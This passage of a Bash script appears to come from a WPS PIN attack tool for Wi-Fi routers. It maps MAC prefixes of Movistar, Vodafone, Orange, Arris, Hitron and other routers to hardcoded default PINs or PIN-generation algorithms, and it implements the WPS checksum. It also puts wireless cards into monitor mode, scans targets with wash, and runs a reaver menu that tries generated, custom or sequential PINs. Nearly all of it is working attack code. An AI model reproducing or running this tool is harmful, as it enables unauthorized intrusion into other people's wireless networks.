  697. DEFAULTSSID="MOVISTAR_XXXX"
  698. FABRICANTE="Observa Telecom para Objetivos y Servicios de Valor"
  699. MODEL="RTA01N_Fase2"
  700. ACTIVATED=0
  701. PIN=71537573
  702.  
  703. elif [ -n "`(echo $ESSID | grep -F Vodafone)`" ] ; then
  704.  
  705. UNKNOWN=2
  706.  
  707. DEFAULTSSID="VodafoneXXXX"
  708. FABRICANTE="Objetivos y Servicios de Valor"
  709. MODEL="Unknown"
  710. ACTIVATED=1
  711. APRATE=1
  712.  
  713. else
  714.  
  715. DEFAULTSSID="MOVISTAR_XXXX or VodafoneXXXX"
  716. FABRICANTE="Objetivos y Servicios de Valor"
  717. MODEL="Unknown"
  718. ACTIVATED=1
  719. SPECIAL=1
  720. PIN=71537573
  721.  
  722. fi
  723.  
  724.  
  725. ;;
  726. 087A4C | 0C96BF | E8CD2D )
  727.  
  728. ZAOMODE                                                                                        
  729. CHECKSUM
  730.  
  731. FABRICANTE="HUAWEI"                             ##### HUAWEI HG532s de Orange (españa)
  732. DEFAULTSSID="Orange-XXXX"
  733. MODEL="HG532s"
  734. ACTIVATED=1
  735.  
  736. ;;
  737. 1CC63C | 507E5D | 743170 | 849CA6 | 880355)   # original algorithms by Stefan Wotan-Stefan Viehböck-Coeman76
  738.  
  739. FABRICANTE="Arcadyan Technology Corporation"
  740. MODEL="ARV7510PW22"
  741. ACTIVATED=1
  742.  
  743. if [ -n "`(echo $ESSID | grep -F Vodafone)`" ] ; then
  744.  
  745. DEFAULTSSID="VodafoneXXXX"
  746. ARCADYAN
  747. CHECKSUM
  748.  
  749. elif [ -n "`(echo $ESSID | grep -F Orange)`" ] ; then
  750.  
  751. UNKNOWN=2
  752.  
  753.  
  754. else
  755.  
  756. DEFAULTSSID="VodafoneXXXX ?"
  757. ARCADYAN
  758. CHECKSUM
  759.  
  760. SPECIAL=1
  761.  
  762. fi
  763.  
  764.  
  765.  
  766. ;;
  767. EC233D )
  768.  
  769. ZAOMODE                                                                                        
  770. CHECKSUM
  771.  
  772. FABRICANTE="HUAWEI"                             ##### HUAWEI HG532e de Djinouti
  773. DEFAULTSSID="HG532e-XXXXXX"
  774. MODEL="HG532e"
  775. ACTIVATED=1
  776.  
  777.  
  778.  
  779.  
  780.  
  781. ;;
  782. 001DCF )                                      ##### DG950A from Arris Interactive  L.L.C
  783.  
  784. PIN=12345670
  785.  
  786. FABRICANTE="Arris Interactive  L.L.C"                            
  787. DEFAULTSSID="ARRIS-XXXX"
  788. MODEL="DG950A"
  789. ACTIVATED=1
  790.  
  791.  
  792.  
  793.  
  794. ;;
  795. BC1401 | 68B6CF | 00265B )                                      ##### Router Hiltron CDE-30364 (used by spanish ISP OnO )
  796.  
  797. ZAOMODE                                                                                        
  798. CHECKSUM
  799.  
  800. FABRICANTE="Hitron Technologies"                            
  801. DEFAULTSSID="ONOXXX0"
  802. MODEL="CDE-30364"
  803. ACTIVATED=0
  804.  
  805.  
  806. ;;
  807. CC5D4E )                                      ##### Router WAP 3205 by zyxell
  808.  
  809. ZAOMODE                                                                                        
  810. CHECKSUM
  811.  
  812. FABRICANTE="zyxell"                            
  813. DEFAULTSSID="ZyXEL"
  814. MODEL="WAP 3205"
  815. ACTIVATED=1
  816.  
  817.  
  818. ############################################################ UNSUPPORTED DEVICES #############################################################
  819.  
  820.  
  821.  
  822. ;;
  823. C03F0E | A021B7 | 2CB05D | C43DC7 | 841B5E | 008EF2 | 744401 | 30469A | 204E7F )  # unsupported ono netgear cg3100d,
  824.  
  825.  
  826. FABRICANTE="Netgear"
  827. DEFAULTSSID="ONOXXXX"
  828. MODEL="CG3100D"
  829. ACTIVATED=0
  830.  
  831. UNKNOWN=2
  832.  
  833. ##########################################################  THE REST; UNKNOWN DEVICE #############################################################
  834.  
  835. ;;
  836. *)                        # for everything else, the first algorithm by zhaochunsheng  
  837. if  [[ $ESSID =~ ^DartyBox_[[:xdigit:]]{3}_[[:xdigit:]]{1}*$ ]]; then  # case of the darty box that can broadcast bssid without any relation to the device real mac
  838.  
  839.  
  840. FABRICANTE="BEWAN"
  841. DEFAULTSSID="DartyBox_XXX_X"
  842. MODEL="Bewan iBox V1.0"
  843. ACTIVATED=1
  844. PIN=12345670
  845.  
  846. else
  847. ZAOMODE                                                                  
  848. CHECKSUM                                                                    
  849.  
  850. UNKNOWN=1                 # this value 1 will identify the routers has unknown
  851.  
  852.  
  853. fi
  854. ;;
  855. esac
  856. }
  857.  
  858.  
  859.  
  860. ################################################################################################ END GENERATE ################ FOR attributing the default PIN #################
  861. #####################################################################################################
  862.  
  863.  
  864.  
  865.  
  866.  
  867.  
  868.  
  869.  
  870.  
  871. CHECKSUM(){                                                                  # The function checksum was written for bash by antares_145 form crack-wifi.com
  872. PIN=`expr 10 '*' $STRING`                                                    # We will have to define first the string $STRING (the 7 first number of the WPS PIN)
  873. ACCUM=0                                                                      # to get a result using this function)
  874.                                                              
  875. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`       # multiplying the first number by 3, the second by 1, the third by 3 etc....
  876. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
  877. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
  878. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
  879. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
  880. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
  881. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`             # so we follow the pattern for our seven number
  882.  
  883. DIGIT=`expr $ACCUM '%' 10`                                                   # we define our digit control: the sum reduced with base 10 to the unit number
  884. CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`                                 # the checksum is equal to " 10 minus  digit control "
  885.  
  886. PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`)                             # Some zero-padding in case that the value of the PIN is under 10000000  
  887. }                                                                            # STRING + CHECKSUM gives the full WPS PIN
  888.  
  889.  
  890.  
  891.  
  892. ZAOMODE(){                                                                   # this is the string (half mac converted to decimal) used in the algorithm originally discovered by
  893. STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`                             # zhaochunsheng in ComputePIN                                            
  894. }
  895.  
  896.  
  897.  
  898.  
  899. IFACE(){                                                                     # For reaver and wash/walsh  we will need a mode monitor interface so this functions will deal
  900.                                                                              #with the task to assign one, that will be declared as MON_ATTACK
  901.  
  902. PRIMARY_CHECK
  903.  
  904.  
  905.  
  906.                                                                              # this function will check if there is any wireless device recognized by he system
  907. iw dev | grep Interface >  /tmp/Interface.txt                                # if there is not, the user will be directed to short menu where no scan or wireless attack
  908.  declare -a INTERFACE                                                        #  ar allowed So we grep the information of iw dev in a text file
  909.  declare -a WLANX                                                            # declare 3 arrays, one for the total interfaces, one for the wlan and the other for mon
  910.  declare -a MONX
  911.   for i in 'INTERFACE' 'WLANX'  'MONX' ;
  912.   do
  913.   count=1                
  914.     if [ "$i" == "INTERFACE" ]; then
  915.       while read -r line; do                                                 # read line by line the output  
  916.       INTERFACE[${count}]="$line"
  917.       count=$((count+1))                                                     # counting lines form one to one
  918.       done < <( cat /tmp/Interface.txt | awk -F' ' '{ print $2 }')           # we grap the second field with awk to fill the array for total interface
  919.     elif [ "$i" == "WLANX" ]; then                                           # the the same but with "grep" wlan to select the mode managed interfaces
  920.       while read -r line; do
  921.       WLANX[${count}]="$line"
  922.       count=$((count+1))  
  923.       done < <( cat /tmp/Interface.txt | awk -F' ' '{ print $2 }' | grep wlan )
  924.     elif [ "$i" == "MONX" ]; then                                            # The same with the mon interfaces
  925.       while read -r line; do
  926.       MONX[${count}]="$line"
  927.       count=$((count+1))
  928.       done < <( cat /tmp/Interface.txt | awk -F' ' '{ print $2 }' | grep mon )
  929.     fi    
  930.  done
  931. rm /tmp/Interface.txt &> /dev/null                                           # we erase the temporary text
  932. IW_INTERFACE=$(echo ${#INTERFACE[@]})                                        # this is just to make a basic control of chipset and interface
  933. IW_WLANX=$(echo ${#WLANX[@]})
  934. IW_MONX=$(echo ${#MONX[@]})
  935.  
  936.  if [ "$IW_INTERFACE" == 0 ]; then                                          # if no wireless device is detected, the script will be limited to a "Short menu" where
  937.  
  938. SORTMENUE_WARNING="$NO_MONITOR_MODE"                                         # no scan or attack
  939.  
  940.  
  941. SHORTMENUE ############################################################ to be redacted according to the language ######################################################
  942.  
  943.  
  944.  fi
  945.  
  946.  
  947. airmon-ng | sed '1,4d' | sed '$d' > /tmp/airmon.txt        # with sed and airmon-ng we take out the interesting information of airmon-ng command
  948. declare -a MON_INTERFACE                                                      # one array for the chipset and one array for the interface  
  949. declare -a MON_CHIPSET
  950.                                                            
  951. for i in 'MON_INTERFACE' 'MON_CHIPSET'  ;                                       # we links the values of te arrays with i
  952. do
  953.  count=1                                                                      # we start from one            
  954.   if [ "$i" == "MON_INTERFACE" ]; then                                        # we start with the array for the mode monitor capable interfaces
  955.       while read -r line; do                                                  # we read the output of airmon-ng line by line and give a value to each line
  956.       MON_INTERFACE[${count}]="$line"                                         # a value to each line
  957.       count=$((count+1))                                                      # and count one by one
  958.       done < <( cat /tmp/airmon.txt | awk -F' ' '{ print $1 }')               # we take the first field that is wlanX or monX in airmon-ng display
  959.   elif [ "$i" == "MON_CHIPSET" ]; then                                        # The same for the chipset of the interface
  960.       while read -r line; do
  961.       MON_CHIPSET[${count}]="$line"
  962.       count=$((count+1))
  963.       done < <( cat /tmp/airmon.txt | awk -F' ' '{ print $2 $3 }' )
  964.  
  965.                                  
  966.    fi    
  967. done
  968. rm /tmp/airmon.txt &> /dev/null
  969. AIRMON_INTERFACE=$(echo ${#MON_INTERFACE[@]})
  970. AIRMON_CHIPSET=$(echo ${#MON_CHIPSET[@]})
  971. BAD_CHIPSET=$( echo "${MON_CHIPSET[1]}" | grep Unknown)
  972.  
  973.  
  974.  
  975. if [ "$AIRMON_INTERFACE" == 0 ]; then                                         #if no mode monitor interface is detected we will remain in short menu )no wash and no reaver)
  976.  
  977. SORTMENUE_WARNING="$NO_MONITOR_MODE"
  978.  
  979.  SHORTMENUE                                                      ###################################### change according to selected language################################
  980.  
  981. elif [ "$IW_WLANX" == 1 ] && [ -n "${BAD_CHIPSET}" ]   ; then         # if the only chipset is unknown by airmon-ng
  982.  
  983.   echo "$MON_ADVERTENCIA"                                                     ################ defined according to language ###########################
  984.   sleep 8
  985.   ifconfig $(echo "${MON_INTERFACE[1]}") down &>/dev/null
  986.   MON_ATTACK=$( airmon-ng start $(echo "${MON_INTERFACE[1]}") | grep enabled |  awk -F' ' '{ print $5 }' |  sed -e 's/)//g' ) &>/dev/null  # we activate mode monitor
  987.   ifconfig $(echo "${MON_INTERFACE[1]}") down &>/dev/null
  988. fi
  989.  
  990. if [ "$AIRMON_INTERFACE" == 1 ] && [ "$IW_INTERFACE" == 1 ]    ; then         # if there is just one interface and no mode monitor interface, this single interface
  991.  ifconfig $(echo "${MON_INTERFACE[1]}") down &>/dev/null
  992.   MONOTORIZED_WLAN=$(echo "${WLANX[1]}")                      ####### MONOTORIZED WLAN will be called to lower interface before wash scan and uper the interface for reaver when dealing with rt3070
  993.   MON_ATTACK=$( airmon-ng start $(echo "${MON_INTERFACE[1]}") | grep enabled |  awk -F' ' '{ print $5 }' |  sed -e 's/)//g' ) &>/dev/null # we activate mode monitor automatically
  994. #  RT_CHECK=$( echo "${MON_CHIPSET[1]}" | grep RalinkRT2870)                  # filter for rt3070 that associate better if wlan is up
  995. #   if [ -n "${RT_CHECK}" ]; then
  996. #     ifconfig $(echo "${WLANX[1]}") up &>/dev/null
  997. #   else
  998.      ifconfig $(echo "${WLANX[1]}") down &>/dev/null
  999. #   fi
  1000. elif [ "$AIRMON_INTERFACE" == 2 ] && [ "$IW_INTERFACE" == 2 ] && [ "$IW_MONX" == 1 ] ; then   # if there is one wlan and one mon the mon will be automatically selected
  1001.   MON_ATTACK=$(echo "${MONX[1]}")
  1002.   MONOTORIZED_WLAN=$(echo "${WLANX[1]}")                      ####### MONOTORIZED WLAN will be called to lower interface before wash scan and uper the interface for reaver when dealing with rt3070  
  1003. #  RT_CHECK=$( echo "${MON_CHIPSET[1]}" | grep RalinkRT2870)                  # filter for rt3070 that associate better if wlan is up
  1004. #   if [ -n "${RT_CHECK}" ]; then
  1005. #     ifconfig $(echo "${WLANX[1]}") up &>/dev/null
  1006. #   else
  1007.      ifconfig $(echo "${WLANX[1]}") down &>/dev/null
  1008. #   fi
  1009. fi
  1010.  
  1011.  
  1012. if [ "$MON_ATTACK" == "" ] && [ "$IW_MONX" == 0 ]; then                        # If there is no interface in monitor mode detected      
  1013.   while [ "$MON_ATTACK" == "" ]; do                                            # Until an interface hasn't been properly chosen
  1014.  
  1015.     echo "$INTERFACEDESIGN"                                                         ########################## modified according to the selected language #################
  1016.  
  1017.      for i in ${!MON_INTERFACE[*]}; do                                         # the user will be prompt to choose between interfaces with mode monitor compatibility
  1018.        CHIPSET_REDLIST=$(echo ${MON_CHIPSET[${i}]} | grep Unknown )
  1019.          if [ -n "${CHIPSET_REDLIST}" ]; then
  1020.            CHIPSET_DISPLAY=$( echo -e "$rojo${MON_CHIPSET[${i}]})$colorbase")
  1021.          else
  1022.            CHIPSET_DISPLAY=$( echo -e "$verdefluo${MON_CHIPSET[${i}]}$colorbase" )
  1023.          fi
  1024.        CHECK_MON_INTERFACE=$(echo "${MON_INTERFACE[${i}]}")
  1025.  
  1026.        DRIVERINTERACE=$( ls -l /sys/class/net/$CHECK_MON_INTERFACE/device/driver | rev | cut -d "/" -f1 | rev )
  1027.        
  1028.         if [ "$CHECK_MON_INTERFACE" = "wlan0" ] || [ "$CHECK_MON_INTERFACE" = "wlan1" ] || [ "$CHECK_MON_INTERFACE" = "wlan2" ] || [ "$CHECK_MON_INTERFACE" = "wlan3" ]|| [ "$CHECK_MON_INTERFACE" = "wlan4" ]|| [ "$CHECK_MON_INTERFACE" = "wlan5" ]|| [ "$CHECK_MON_INTERFACE" = "wlan6" ]|| [ "$CHECK_MON_INTERFACE" = "wlan7" ]|| [ "$CHECK_MON_INTERFACE" = "wlan8" ]|| [ "$CHECK_MON_INTERFACE" = "wlan9" ]; then
  1029.          
  1030.          
  1031.    
  1032.          echo -e "     $amarillo$i$blanco        ${MON_INTERFACE[${i}]}       $CHIPSET_DISPLAY$colorbase - driver $azulfluo$DRIVERINTERACE"
  1033.      
  1034.        else
  1035.      
  1036.          echo -e "     $amarillo$i$blanco        ${MON_INTERFACE[${i}]}       $CHIPSET_DISPLAY$colorbase - driver $azulfluo$DRIVERINTERACE"  
  1037.        fi  
  1038.  
  1039.     done
  1040.   echo ""
  1041.   echo -e "    $colorbase          ---------------------------------------------------"
  1042.   echo ""  
  1043.  
  1044.  
  1045.  
  1046.  
  1047.   SELECT_THEIFACE                            ############################ modified according to the language ###########################
  1048.  
  1049.   ifconfig $(echo ${MON_INTERFACE[${i}]}) down &>/dev/null                           # We bring down the interface
  1050.  
  1051.   MON_ATTACK=$(airmon-ng start $(echo ${MON_INTERFACE[${i}]}) | grep enabled |  awk -F' ' '{ print $5 }' |  sed -e 's/)//g') &>/dev/null   # We start mode monitor                    
  1052.   MONOTORIZED_WLAN=$(echo ${MON_INTERFACE[${i}]})   ############ Test for rt3070 & co
  1053.  
  1054. #  RT_CHECK=$(echo ${MON_CHIPSET[${i}]} | grep RalinkRT2870 )                  # filter for rt3070 that associate better if wlan is up
  1055. #   if [ -n "${RT_CHECK}" ]; then
  1056. #     ifconfig $(echo ${MON_INTERFACE[${i}]}) up &>/dev/null
  1057. #   else
  1058.      ifconfig $(echo ${MON_INTERFACE[${i}]}) down &>/dev/null
  1059. #   fi
  1060.  
  1061.   done
  1062. fi
  1063.  
  1064.  
  1065.  
  1066.  
  1067. IFACE_SELECTION(){                                           ################################ IFACE SELECTION ##################################################
  1068.  
  1069. while [ "$MON_ATTACK" == "" ]; do                                            # at the end of iface we call this function to select an interface for reaver and wash
  1070.  
  1071.   echo "$INTERFACEDESIGN"                                                         ########################## modified according to the selected language #################
  1072.  
  1073.   for i in ${!MON_INTERFACE[*]}; do                                          # we display the available interface
  1074.    
  1075.  
  1076.  
  1077.  
  1078. CHIPSET_REDLIST=$(echo ${MON_CHIPSET[${i}]} | grep Unknown )
  1079.          if [ -n "${CHIPSET_REDLIST}" ]; then
  1080.            CHIPSET_DISPLAY=$( echo -e "$rojo${MON_CHIPSET[${i}]})$colorbase")
  1081.          else
  1082.            CHIPSET_DISPLAY=$( echo -e "$verdefluo${MON_CHIPSET[${i}]}$colorbase" )
  1083.          fi
  1084.  
  1085. CHECK_MON_INTERFACE=$(echo ${MON_INTERFACE[${i}]})
  1086.  
  1087. DRIVERINTERACE=$( ls -l /sys/class/net/$CHECK_MON_INTERFACE/device/driver | rev | cut -d "/" -f1 | rev )
  1088.  
  1089.      if [ "$CHECK_MON_INTERFACE" = "wlan0" ] || [ "$CHECK_MON_INTERFACE" = "wlan1" ] || [ "$CHECK_MON_INTERFACE" = "wlan2" ] || [ "$CHECK_MON_INTERFACE" = "wlan3" ]|| [ "$CHECK_MON_INTERFACE" = "wlan4" ]|| [ "$CHECK_MON_INTERFACE" = "wlan5" ]|| [ "$CHECK_MON_INTERFACE" = "wlan6" ]|| [ "$CHECK_MON_INTERFACE" = "wlan7" ]|| [ "$CHECK_MON_INTERFACE" = "wlan8" ]|| [ "$CHECK_MON_INTERFACE" = "wlan9" ]; then
  1090.  
  1091.  
  1092.  
  1093.        echo -e "     $amarillo$i$blanco        ${MON_INTERFACE[${i}]}      $CHIPSET_DISPLAY$colorbase - driver $azulfluo$DRIVERINTERACE "              # displayed with this for loop
  1094.        else
  1095.        echo -e "     $amarillo$i$blanco        ${MON_INTERFACE[${i}]}       $CHIPSET_DISPLAY$colorbase - driver $azulfluo$DRIVERINTERACE "              # displayed with this for loop  
  1096.        fi  
  1097.  
  1098.  
  1099.   done
  1100.   echo ""
  1101.   echo -e "    $colorbase          ---------------------------------------------------"
  1102.   echo ""
  1103.  
  1104. SELECT_THEIFACE                            ############################ modified according to the language ###########################
  1105.  
  1106. CHOIX=$( echo " ${MON_INTERFACE[${i}]} ")                                 #CHOIX is the chosen interface by the user
  1107.  
  1108.   if [ "$CHOIX" == "" ]; then
  1109.    IFACE_SELECTION                                                        # recursively calling the function in case the user made a mistake to re-enter data
  1110.   fi
  1111. MONITORIZED=$( echo "$CHOIX" | grep mon )                                   # in case the interface is in mode monitor we create monotorized
  1112.  
  1113.   if [ "$MONITORIZED"  == "" ]; then                                        # if monotorized is empty it means the ethX or wlanX has to be put into monitor mode
  1114.     ifconfig $CHOIX down &>/dev/null                                              # we bring the interface down
  1115.     MON_ATTACK=$( airmon-ng start $CHOIX | grep enabled |  awk -F' ' '{ print $5 }' |  sed -e 's/)//g' ) &>/dev/null  # we activate mode monitor an in the
  1116.     MONOTORIZED_WLAN="$CHOIX"
  1117. #     RT_CHECK=$( echo ${MON_CHIPSET[${i}]} | grep RalinkRT2870 )                  # filter for rt3070 that associate better if wlan is up
  1118. #     if [ -n "${RT_CHECK}" ]; then
  1119. #       ifconfig $(echo ${MON_INTERFACE[${i}]}) up &>/dev/null
  1120. #     else
  1121.        ifconfig $(echo ${MON_INTERFACE[${i}]}) down &>/dev/null
  1122. #     fi
  1123.                                                 # identifier of the interface, then we ensure disconnect
  1124.   else
  1125.   MON_ATTACK="$CHOIX"  
  1126.   PHY=$(  airmon-ng | grep $CHOIX | cut -d "-" -f2 | tr -d ' ' | sed 's:^.\(.*\).$:\1:' ) &> /dev/null
  1127.   MONOTORIZED_WLAN=$( airmon-ng | grep $PHY | awk -F' ' '{ print $1 }' | grep wlan ) &> /dev/null
  1128.  
  1129.  
  1130.  fi                                                                           # check & disconnect function
  1131. done
  1132. }
  1133.  
  1134. IFACE_SELECTION                                                
  1135.  
  1136. CHIPSET_CHECK=$( (echo ${MON_CHIPSET[${i}]}) | grep Unknown )                # last we check if the chipset is unknown and will display a warning if it is true
  1137.  
  1138. if [ -n "${CHIPSET_CHECK}" ]; then                                           # if the variables full then it means that chipset is unknown            
  1139.  
  1140. echo "$AIRMON_WARNING"
  1141. sleep 8
  1142.  
  1143. fi
  1144. RT_CHECK=$( airmon-ng | grep $MONOTORIZED_WLAN | grep Ralink ) &> /dev/null ############3TESTING#####################
  1145.  
  1146. }
  1147.  
  1148.  
  1149.  
  1150.  
  1151.  
  1152.  
  1153.  
  1154.  
  1155.  
  1156.  
  1157.  
  1158.  
  1159.  
  1160. WASH_SCAN(){                                                  # This function will launch wash generate default PIN for the scanned AP and display the result with some color
  1161. if [ "$WALSH_O_WASH" == "wash" ]; then
  1162.  
  1163.    declare -a BSSID                                                      # We declare array to fill with the scan results, bssid, essid, etc...
  1164.    declare -a CHANNEL                                                    #
  1165.    declare -a RSSI                                            
  1166.    declare -a WPS
  1167.    declare -a LOCKED
  1168.    declare -a ESSID
  1169.      for i in 'BSSID' 'CHANNEL' 'RSSI' 'WPS' 'LOCKED' 'ESSID';                               # linking every array with "i"  
  1170.        do
  1171.        count=1                                                                                # start from 1
  1172.          if [ "$i" == "BSSID" ]; then                                                        # First array for bssid of target AP  
  1173.            while read -r line; do                                                            # we read our temp file line by line
  1174.              BSSID[${count}]="$line"                                                           #
  1175.              count=$((count+1))                                                                # and count from one to one
  1176.            done < <( cat wash_scan.txt | awk -F' ' '{ print $1 }')                      # we keep the first field using space as a delimiter (Bssid in the scan=
  1177.         elif [ "$i" == "CHANNEL" ]; then                                                    # and so on...
  1178.           while read -r line; do
  1179.            CHANNEL[${count}]="$line"
  1180.            count=$((count+1))
  1181.           done < <( cat wash_scan.txt | awk -F' ' '{ print $2 }')                      # second field which is the channel number
  1182.         elif [ "$i" == "RSSI" ]; then                                                        # etc...
  1183.           while read -r line; do
  1184.             RSSI[${count}]="$line"
  1185.             count=$((count+1))
  1186.           done < <( cat wash_scan.txt | awk -F' ' '{ print $3 }')
  1187.        elif [ "$i" == "WPS" ]; then
  1188.           while read -r line; do
  1189.             WPS[${count}]="$line"
  1190.             count=$((count+1))
  1191.           done < <( cat wash_scan.txt | awk -F' ' '{ print $4 }')
  1192.        elif [ "$i" == "LOCKED" ]; then
  1193.           while read -r line; do
  1194.             LOCKED[${count}]="$line"
  1195.             count=$((count+1))
  1196.           done < <( cat wash_scan.txt | awk -F' ' '{ print $5 }')
  1197.        elif [ "$i" == "ESSID" ]; then
  1198.          while read -r line; do
  1199.          ESSID[${count}]="$line"
  1200.          count=$((count+1))
  1201.          done < <( cat wash_scan.txt | awk -F' ' '{ print $6 }')                        
  1202.        fi
  1203.   clear
  1204.   done                        
  1205.  
  1206. else
  1207.  
  1208.  
  1209.    declare -a BSSID
  1210.    declare -a ESSID
  1211.       for i in 'BSSID' 'ESSID';
  1212.        do
  1213.        count=1                                                                                # start from 1
  1214.          if [ "$i" == "BSSID" ]; then                                                        # First array for bssid of target AP  
  1215.            while read -r line; do                                                            # we read our temp file line by line
  1216.              BSSID[${count}]="$line"                                                           #
  1217.              count=$((count+1))                                                                # and count from one to one
  1218.            done < <( cat wash_scan.txt | awk -F' ' '{ print $1 }')    
  1219.          elif [ "$i" == "ESSID" ]; then                                                        # second array for essid of target AP  
  1220.            while read -r line; do                                                              # we read our temp file line by line
  1221.              ESSID[${count}]="$line"                                                           #
  1222.              count=$((count+1))                                                                # and count from one to one
  1223.            done < <( cat wash_scan.txt | awk -F' ' '{ print $2 }')
  1224.          fi
  1225.       clear
  1226.       done
  1227.        
  1228.  
  1229. fi  
  1230.  
  1231. WASH_DISPLAY #################################################################to be defined according to the languages##########################################################
  1232.  
  1233. OUTPUT
  1234.  
  1235. ATTACK
  1236.  
  1237. }
  1238.  
  1239.  
  1240.  
  1241.  
  1242.  
  1243. REAVER_CHECK(){      
  1244.  
  1245.                                                                            # This function is here to check if reaver is installed, if not the user will be in short menu
  1246. which reaver &> /dev/null                                                  # Thanks antares for this trick for fast checking if reaver is present
  1247. if [ $? -ne 0 ]; then                                                        
  1248. SORTMENUE_WARNING="$NO_REAVER" ########################################### to define according to the language, here to warn about need to install reaver
  1249. SHORTMENUE
  1250. fi
  1251.  
  1252. which walsh &> /dev/null                                                   # if the reaver is bypassed user can have reaver 1.3 with walsh or reaver 1.4 with wash so
  1253. if [ $? -ne 0 ]; then                                                      # we determine which one is gonna be used
  1254.   WALSH_O_WASH=$( echo "wash")
  1255. else
  1256.   WALSH_O_WASH=$(echo "walsh")
  1257. fi
  1258. }
  1259.  
  1260.  
  1261.  
  1262.  
  1263. ATTACK(){
  1264.  
  1265.  
  1266.      WPCGENERATOR                                                         # we check and generate wpc file
  1267.  
  1268.  
  1269.  
  1270.  
  1271.   if [[ "$HEAD1" = "0" ]] && [[ "$HEAD2" = "0" ]] && [[ "$HEAD3" = "0" ]] ; then                         # Now we show the PIN that will be used for attack,
  1272.                                                                     # now we deal with session where no PIN has been tried
  1273.                                        
  1274.     PRIMERAMITAD=$( cat "$DIRECTORY/$WPCNAME" | awk NR==4)                                                            
  1275.     SEGUNDAMITAD=$( cat "$DIRECTORY/$WPCNAME" | awk NR==10004)        # that for our second half PIN, the first one of the list
  1276.    
  1277.     STRING=$( echo "$PRIMERAMITAD$SEGUNDAMITAD" )                   # that the 7 digits of the PIN to be shown,the next to be sent by reaver
  1278.  
  1279.    
  1280.    
  1281.     CHECKSUM
  1282.  
  1283.   elif (( "$HEAD1" >> 0 )) && [[ "$HEAD3" = "0" ]] ; then        # and that is when we didn't made the first half but tried some PIN
  1284.    
  1285.     NEXTFIRSTHALF=`expr 4 '+' $HEAD1`
  1286.    
  1287.     PRIMERAMITAD=$( cat "$DIRECTORY/$WPCNAME" | awk NR==$NEXTFIRSTHALF)
  1288.     SEGUNDAMITAD=$( cat "$DIRECTORY/$WPCNAME" | awk NR==10004)        # that for our second half PIN, the first one of the list
  1289.        
  1290.     STRING=$( echo "$PRIMERAMITAD$SEGUNDAMITAD" )
  1291.    
  1292.     SUMUPNOM6 # TO BE WRITTEN ACCORDING TO THE LANGUAGE#
  1293.    
  1294.    
  1295.     CHECKSUM
  1296.  
  1297.   elif  [[ "$HEAD3" = "1" ]]  ; then        # We got the M6 and the first half of WPSPIN
  1298.  
  1299.     NEXTFIRSTHALF=`expr $HEAD1 '+' 4`
  1300.     PRIMERAMITAD=$( cat "$DIRECTORY/$WPCNAME" | awk NR==$NEXTFIRSTHALF)
  1301.     NEXTSECONDHALF=`expr $HEAD2 '+' 10004`
  1302.     SEGUNDAMITAD=$( cat "$DIRECTORY/$WPCNAME" | awk NR==$NEXTSECONDHALF)
  1303.  
  1304.     STRING=$( echo "$PRIMERAMITAD$SEGUNDAMITAD" )
  1305.    
  1306.    
  1307.     SUMUPM6 # TO BE WRITTEN ACCORDING TO THE LANGUAGE
  1308.  
  1309.  
  1310.  
  1311.    
  1312.     CHECKSUM
  1313.  
  1314.  
  1315.    elif [[ "$HEAD3" == "2" ]] ; then
  1316.  
  1317.     NEXTFIRSTHALF=`expr $HEAD1 '+' 4`
  1318.     PRIMERAMITAD=$( cat "$DIRECTORY/$WPCNAME" | awk NR==$NEXTFIRSTHALF)
  1319.     NEXTSECONDHALF=`expr $HEAD2 '+' 10004`
  1320.     SEGUNDAMITAD=$( cat "$DIRECTORY/$WPCNAME" | awk NR==$NEXTSECONDHALF)
  1321.  
  1322.     STRING=$( echo "$PRIMERAMITAD$SEGUNDAMITAD" )
  1323.  
  1324.    
  1325.    
  1326.    CHECKSUM
  1327.  
  1328.    PINFOUND # TO BE WRITTEN ACCORDING TO THE LANGUAGE
  1329.  
  1330.   fi                                                     # if not the PIN displayed will be the generated by default
  1331.    
  1332.  
  1333.      ATTACK_MENUE_DISPLAY  #############################################  definer according to the language            
  1334.    
  1335.      
  1336.  
  1337.      if [ "$ATTACK_MENUE_CHOICE" == 1 ]; then                             # first option of attack menu: attack with reaver and default PIN
  1338.      
  1339.       ls "$DIRECTORY/$WPCNAME" &> /dev/null
  1340.  
  1341.          if [ $? -ne 0 ]; then                                               # if there is no session prepared
  1342.  
  1343.               WPCGENERATOR                                                       # We call the function generate the wpc session
  1344.          fi
  1345.      
  1346.       ATTACK_ATTACK
  1347.            
  1348.       ATTACK                                           # and call recessively the function ATTACK
  1349.  
  1350.      elif [ "$ATTACK_MENUE_CHOICE" == 2 ]; then                           # second option, attack with a customized PIN  
  1351.      
  1352.      CUSTOMPIN        ################## TO BE DEFINED ACCORDING TO THE LANGUAGE, to enter manually one PIN
  1353.  
  1354.    #  WPCGENERATOR                                                         # We call the function to generate the wpc session
  1355.      
  1356.    #  ATTACK_ATTACK                                                        # that basically the reaver order and grabbing key system
  1357.            
  1358.      ATTACK                                           # and call recessively the function ATTACK
  1359.  
  1360.      elif [ "$ATTACK_MENUE_CHOICE" == 3 ]; then                           # Third option to enter a sequence of PIN
  1361.  
  1362.      SECATOR         ################## TO BE DEFINED ACCORDING TO THE LANGUAGE, to enter a sequence of PIN
  1363.  
  1364.    #  WPCGENERATOR                                                         # We call the function to generate the wpc session
  1365.      
  1366.    #  ATTACK_ATTACK                                                        # that basically the reaver order and grabbing key system
  1367.            
  1368.      ATTACK                                           # and call recessively the function ATTACK
  1369.  
  1370.  
  1371.       elif [ "$ATTACK_MENUE_CHOICE" == 4 ]; then  # ther fourth option allows user to enter other arguments
  1372.  
  1373.      CUSTOMREAVER  ########### writen according to the language
  1374.    
  1375.       ATTACK
  1376.  
